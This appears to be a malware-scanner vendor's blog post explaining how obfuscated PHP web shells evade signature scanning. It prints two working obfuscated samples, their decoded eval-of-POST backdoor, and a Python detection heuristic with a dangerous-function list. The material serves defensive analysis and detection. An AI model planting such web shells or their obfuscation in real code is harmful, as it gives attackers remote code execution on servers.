Today we released version 1.24.13 of the ISPProtect malware scanner.
It includes new malware signatures and new heuristics for dynamically generated malware code. Below we show an example of this type of malware, which is hard to recognize with static code scanners (such as the hex signatures used by virus scanners).
<?php
$code1="aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9";
$sp9="st"."r_"."r"."ep"."la"."ce";                                  // "str_replace"
$nv7 = $sp9("vc","","cvcrvcevcavctvce_fvcuncvctivconvc");            // "create_function"
$bd0=$sp9("vb","","bvbasvbe6vb4_dvbecvbovbde");                      // "base64_decode"
$ex5 = $nv7('', $bd0($code1));                                       // create_function('', base64_decode($code1))
$ex5();
In fact, the above code is nothing more than an encoded version of the following:
<?php if(isset($_POST["qipj"])){@eval($_POST["qipj"]);exit;}
As the key name (here "qipj") can be any string, the base64-encoded string in the visible source code (aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9) is dynamic, so creating a hex signature for it makes no sense.
In addition, the replacement strings (here "vc" and "vb") can also be dynamic.
So the malware creator could, with no effort, change the code to the following, which does exactly the same:
<?php
$c01de1="aWYoIGlzc2V0KCRfUE9TVFsiYXZjcyJdKSl7QGV2YWwoJF9QT1NUWyJhdmNzIl0pO2V4aXQ7IH0=";
$sp2="s"."tr".""."_"."rep".""."l"."a"."c".""."e"."";                // "str_replace"
$avc7 = $sp2("234","","c234r234e234a234t234e_f234un234cti234on234"); // "create_function"
$bd0=$sp2("567","","b567as567e65674_d567ec567o567de");               // "base64_decode"
$v315 = $avc7('', $bd0($c01de1));                                    // create_function('', base64_decode($c01de1))
$v315();
As you can see, each line of the code has changed without affecting the result.
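As an added illustration (not ISPProtect's code), here is a small Python heuristic of the kind described above: it folds literal string concatenation, evaluates str_replace() calls whose arguments are all literals, rewrites the variable-as-function calls to the names they resolve to, and base64-decodes bound literals, so the dynamic function names and the eval() payload become visible to a scanner regardless of which filler strings and key names the author picked. The embedded sample is the first variant from this post; the regular expressions and the list of dangerous functions are assumptions of this example.

```python
import base64
import re

# Constructed input: the first obfuscated sample from the post, embedded so this runs offline.
SAMPLE = (
    '<?php $code1="aWYoaXNzZXQoJF9QT1NUWyJxaXBqIl0pKXtAZXZhbCgkX1BPU1RbInFpcGoiXSk7ZXhpdDt9"; '
    '$sp9="st"."r_"."r"."ep"."la"."ce"; '
    '$nv7 = $sp9("vc","","cvcrvcevcavctvce_fvcuncvctivconvc"); '
    '$bd0=$sp9("vb","","bvbasvbe6vb4_dvbecvbovbde"); '
    "$ex5 = $nv7('', $bd0($code1)); $ex5();"
)
CONCAT = re.compile(r'"([^"]*)"\s*\.\s*"([^"]*)"')              # "a"."b"
ASSIGN = re.compile(r'(\$\w+)\s*=\s*"([^"]*)"\s*;')              # $v = "lit";
CALL3 = re.compile(r'(\$\w+)\s*=\s*(\$\w+)\s*\(\s*"([^"]*)"\s*,\s*"([^"]*)"\s*,\s*"([^"]*)"\s*\)\s*;')
DANGEROUS = ("eval", "assert", "create_function", "base64_decode", "system", "shell_exec")
EVAL_INPUT = re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)")

def fold_concat(src):
    # Collapse "st"."r_"."r" style chains (including "" pieces) until nothing changes.
    prev = None
    while prev != src:
        prev, src = src, CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', src)
    return src

def resolve_names(src):
    # Bind $var = "literal", evaluate str_replace() with literal args, rewrite $var( calls.
    names = dict(ASSIGN.findall(src))
    for target, fn, search, repl, subject in CALL3.findall(src):
        if names.get(fn) == "str_replace":
            names[target] = subject.replace(search, repl)
    for var, value in names.items():
        src = re.sub(re.escape(var) + r"\s*\(", lambda _, v=value: v + "(", src)
    return src, names

def decode_literals(names):
    # Base64-decode every bound literal that is valid base64 and decodes to ASCII text.
    out = []
    for value in names.values():
        try:
            out.append(base64.b64decode(value, validate=True).decode("ascii"))
        except (ValueError, UnicodeDecodeError):
            continue
    return out

def scan(src):
    # Returns (dangerous functions visible after de-obfuscation, decoded payloads that eval() request input).
    resolved, names = resolve_names(fold_concat(src))
    hits = sorted(fn for fn in DANGEROUS if re.search(r"\b%s\s*\(" % fn, resolved))
    payloads = [p for p in decode_literals(names) if EVAL_INPUT.search(p)]
    return hits, payloads
```

Running scan() on the second variant from this post gives the same two function names and a payload reading the "avcs" key, which is the point: the heuristic keys on what the code resolves to, not on the bytes it is written with.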
Marius Burkard has been working as a software developer for 20 years and has several years of experience as a server administrator. As one of the lead developers of the ISPConfig control panel and technical contact for several hundred web hosting customers, he has extensive experience with malware, hacked websites and the analysis of vulnerabilities.